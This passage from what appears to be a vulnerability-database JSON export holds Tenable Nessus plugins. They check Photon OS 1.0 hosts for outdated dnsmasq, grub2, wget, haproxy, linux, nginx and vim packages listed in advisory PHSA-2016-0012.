script_require_keys(\"dns_server/version\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/dns\", 53);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = \"dnsmasq\";\n\nport = get_kb_item(\"Services/udp/dns\");\nif (!port) port = 53;\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# dnsmasq replies to BIND.VERSION\nversion = get_kb_item_or_exit(\"dns_server/version\");\nversion = tolower(version);\ndisplay_version = version;\n\nif (version !~ \"dnsmasq-(v)?\")\n audit(AUDIT_NOT_LISTEN, app_name, port);\n\nversion = ereg_replace(pattern:\"^dnsmasq-(v)?(.*)$\", replace:\"\\2\", string:version);\n\nif (version == '2')\n audit(AUDIT_VER_NOT_GRANULAR, app_name, port, display_version);\n\n# vuln introduced in 2.73, fixed in 2.76\nif (version =~ \"^2\\.7[345]($|[^0-9])\")\n{\n report = '\\n' +\n '\\n Installed version : ' + display_version +\n '\\n Fixed version : dnsmasq-2.76' +\n '\\n';\n security_report_v4(port:53, proto:\"udp\", severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, app_name, port, version, 'udp');\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-03-17T22:39:13", "bulletinFamily": "scanner", "description": "An update of the dnsmasq package has been released.", "modified": "2019-02-07T00:00:00", "id": "PHOTONOS_PHSA-2016-0012_DNSMASQ.NASL", "href": "https://www.tenable.com/plugins/nessus/121647", "published": "2019-02-07T00:00:00", "title": "Photon OS 1.0: Dnsmasq PHSA-2016-0012", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2016-0012. The text\n# itself is copyright (C) VMware, Inc.\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121647);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2019/02/07\");\n\n script_cve_id(\"CVE-2015-8899\");\n\n script_name(english:\"Photon OS 1.0: Dnsmasq PHSA-2016-0012\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the dnsmasq package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-12.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-9555\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:dnsmasq\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"dnsmasq-2.76-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"dnsmasq-debuginfo-2.76-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dnsmasq\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T22:39:13", "bulletinFamily": "scanner", "description": "An update of the grub2 package has been released.", "modified": "2019-02-07T00:00:00", "id": "PHOTONOS_PHSA-2016-0012_GRUB2.NASL", "href": "https://www.tenable.com/plugins/nessus/121648", "published": "2019-02-07T00:00:00", "title": "Photon OS 1.0: Grub2 PHSA-2016-0012", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2016-0012. The text\n# itself is copyright (C) VMware, Inc.\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121648);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2019/02/07\");\n\n script_cve_id(\"CVE-2015-8370\");\n\n script_name(english:\"Photon OS 1.0: Grub2 PHSA-2016-0012\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the grub2 package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-12.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-9555\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:grub2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"grub2-2.02-5.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"grub2-efi-2.02-3.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"grub2-efi-lang-2.02-3.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"grub2-lang-2.02-5.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"grub2\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-03T01:41:25", "bulletinFamily": "scanner", "description": "An update of the wget package has been released.", "modified": "2020-05-02T00:00:00", "id": "PHOTONOS_PHSA-2016-0012_WGET.NASL", "href": "https://www.tenable.com/plugins/nessus/121653", "published": "2019-02-07T00:00:00", "title": "Photon OS 1.0: Wget PHSA-2016-0012", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2016-0012. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121653);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/04/02 21:54:17\");\n\n script_cve_id(\"CVE-2016-7098\");\n\n script_name(english:\"Photon OS 1.0: Wget PHSA-2016-0012\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the wget package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-12.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-9555\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"wget-1.18-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"wget-debuginfo-1.18-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T22:39:13", "bulletinFamily": "scanner", "description": "An update of the haproxy package has been released.", "modified": "2019-02-07T00:00:00", "id": "PHOTONOS_PHSA-2016-0012_HAPROXY.NASL", "href": "https://www.tenable.com/plugins/nessus/121649", "published": "2019-02-07T00:00:00", "title": "Photon OS 1.0: Haproxy PHSA-2016-0012", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2016-0012. The text\n# itself is copyright (C) VMware, Inc.\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121649);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2019/02/07\");\n\n script_cve_id(\"CVE-2016-5360\");\n\n script_name(english:\"Photon OS 1.0: Haproxy PHSA-2016-0012\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the haproxy package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-12.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-9555\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:haproxy\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"haproxy-1.6.10-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"haproxy-debuginfo-1.6.10-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"haproxy-doc-1.6.10-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"haproxy\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T22:39:13", "bulletinFamily": "scanner", "description": "An update of the linux package has been released.", "modified": "2019-02-07T00:00:00", "id": "PHOTONOS_PHSA-2016-0012_LINUX.NASL", "href": "https://www.tenable.com/plugins/nessus/121650", "published": "2019-02-07T00:00:00", "title": "Photon OS 1.0: Linux PHSA-2016-0012", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2016-0012. The text\n# itself is copyright (C) VMware, Inc.\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121650);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2019/03/08\");\n\n script_cve_id(\"CVE-2016-9083\", \"CVE-2016-9555\");\n\n script_name(english:\"Photon OS 1.0: Linux PHSA-2016-0012\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the linux package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-12.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-9555\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-4.4.35-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-api-headers-4.4.35-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-debuginfo-4.4.35-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-dev-4.4.35-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-docs-4.4.35-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-drivers-gpu-4.4.35-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-4.4.35-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-debuginfo-4.4.35-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-devel-4.4.35-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-esx-docs-4.4.35-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-oprofile-4.4.35-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-sound-4.4.35-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-tools-4.4.35-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"linux-tools-debuginfo-4.4.35-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T22:39:14", "bulletinFamily": "scanner", "description": "An update of the nginx package has been released.", "modified": "2019-02-07T00:00:00", "id": "PHOTONOS_PHSA-2016-0012_NGINX.NASL", "href": "https://www.tenable.com/plugins/nessus/121651", "published": "2019-02-07T00:00:00", "title": "Photon OS 1.0: Nginx PHSA-2016-0012", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2016-0012. The text\n# itself is copyright (C) VMware, Inc.\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121651);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2019/02/07\");\n\n script_cve_id(\"CVE-2016-4450\");\n\n script_name(english:\"Photon OS 1.0: Nginx PHSA-2016-0012\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the nginx package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-12.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-9555\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:nginx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"nginx-1.10.0-4.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"nginx-debuginfo-1.10.0-4.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nginx\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T22:39:14", "bulletinFamily": "scanner", "description": "An update of the vim package has been released.", "modified": "2019-02-07T00:00:00", "id": "PHOTONOS_PHSA-2016-0012_VIM.NASL", "href": "https://www.tenable.com/plugins/nessus/121652", "published": "2019-02-07T00:00:00", "title": "Photon OS 1.0: Vim PHSA-2016-0012", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2016-0012. The text\n# itself is copyright (C) VMware, 